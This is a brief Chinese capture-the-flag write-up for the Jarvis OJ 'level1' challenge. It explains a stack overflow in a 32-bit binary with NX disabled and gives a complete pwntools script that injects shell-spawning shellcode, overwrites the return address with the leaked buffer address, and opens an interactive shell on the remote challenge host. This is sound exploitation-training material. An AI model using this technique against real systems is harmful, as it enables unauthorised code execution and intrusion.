还是先checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢出漏洞,同时程序泄露了buf缓冲区的地址,因此我们考虑将shellcode写入数据部分,然后将返回地址修改为shellcode的地址。
构造payload=shellcode+padding+地址,脚本如下:
from pwn import *
context.log_level="debug"
p=remote("pwn2.jarvisoj.com",9877)
e=ELF("level1")
shel=asm(shellcraft.sh())
t=p.recvline()
buf_addr=t[14:-2] #获取buf地址
print(buf_addr)
payload=shel+'a'*(0x88+0x4-len(shel))+p32(int(buf_addr,16))
p.send(payload)
p.interactive()
p.close()
几个收获:
了解pwntools的构造shellcode方法,在nx未开启时的pwn方法。